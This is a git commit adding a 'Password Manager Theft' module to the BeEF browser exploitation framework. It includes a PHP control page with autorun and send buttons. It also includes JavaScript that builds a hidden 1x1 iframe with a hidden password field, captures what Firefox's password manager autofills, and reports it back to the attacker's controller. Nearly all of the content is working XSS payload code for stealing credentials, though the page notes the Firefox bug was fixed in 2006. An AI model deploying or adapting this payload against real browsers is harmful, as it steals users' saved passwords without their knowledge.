finally added firefox password manager password theft module

git-svn-id: https://beef.googlecode.com/svn/trunk@15 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

CHANGELOG

@@ -1,3 +1,6 @@
+Version 0.4.0.2
+Firefox password manager theft added
+
 Version 0.4.0.1
 Example (example.php) hardcoded path bug fixed
 

VERSION

@@ -1 +1 @@
-0.4.0.1
+0.4.0.2

modules/standard/passwd_theft/index.php

@@ -0,0 +1,58 @@
+<?
+	// Copyright (c) 2006-2010, Wade Alcorn 
+	// All Rights Reserved
+	// wade@bindshell.net - http://www.bindshell.net
+
+	require_once("../../../include/common.inc.php"); // included for get_b64_file()
+	DEFINE('JS_FILE', './template.js');
+?>
+
+<!--
+
+BeEF: http://ha.ckers.org/weird/xss-password-manager.html
+BeEF: Written by RSnake h@ckers.org
+BeEF: http://sla.ckers.org/forum/read.php?2,131
+BeEF: https://bugzilla.mozilla.org/show_bug.cgi?id=360493
+BeEF: http://it.slashdot.org/article.pl?sid=06/11/21/2319243
+BeEF: the following is the boiler plate from the exploit
+
+XSS demo for stealing passwords from the Firefox password manager
+Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Your mileage may vary.
+
+-->
+
+<script>
+
+	get_b64_code_alert = function () {
+		// javascript is loaded from a file - it could be hard coded
+		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		
+		return b64code;
+	}
+
+	Element.Methods.set_autorun = function() {
+		ar.enable('Alert Dialog', get_b64_code_alert());
+	}
+	
+	Element.Methods.send_now = function() {
+		do_send(get_b64_code_alert());
+	}
+
+	// add construct code to DOM
+	Element.addMethods();
+</script>
+
+<!-- PAGE CONTENT -->
+<div id="module_header"> Firefox Password Manager Password Theft</div>
+This module will attempt to steal a password from Firefox's password manager.<br><br>
+<div id="module_subsection">
+	<form name="myform">
+		<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
+		<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
+	</form>
+</div>
+
+<div class="entry">
+	<br>
+	This bug was fixed in <a href=https://bugzilla.mozilla.org/show_bug.cgi?id=360493>2006</a>.
+</div>

modules/standard/passwd_theft/name.txt

@@ -0,0 +1 @@
+Password Manager Theft

modules/standard/passwd_theft/template.js

@@ -0,0 +1,16 @@
+
+// create iframe
+var iframe = document.createElement('iframe');
+iframe.setAttribute("width", "1");
+iframe.setAttribute("height", "1");
+iframe.setAttribute("style", "visibility:hidden;");
+document.body.appendChild(iframe);
+
+// write content to iframe and return result
+ifrm = (iframe.contentWindow) ? iframe.contentWindow : (iframe.contentDocument.document) ? iframe.contentDocument.document : iframe.contentDocument;
+ifrm.document.write('<form><input id=p type=password style=visibility:hidden></form>');
+ifrm.setTimeout('parent.return_result(parent.result_id, "Password: " + document.getElementById("p").value)', 100);
+
+// remove iframe
+setTimeout('document.body.removeChild(iframe);', 200);
+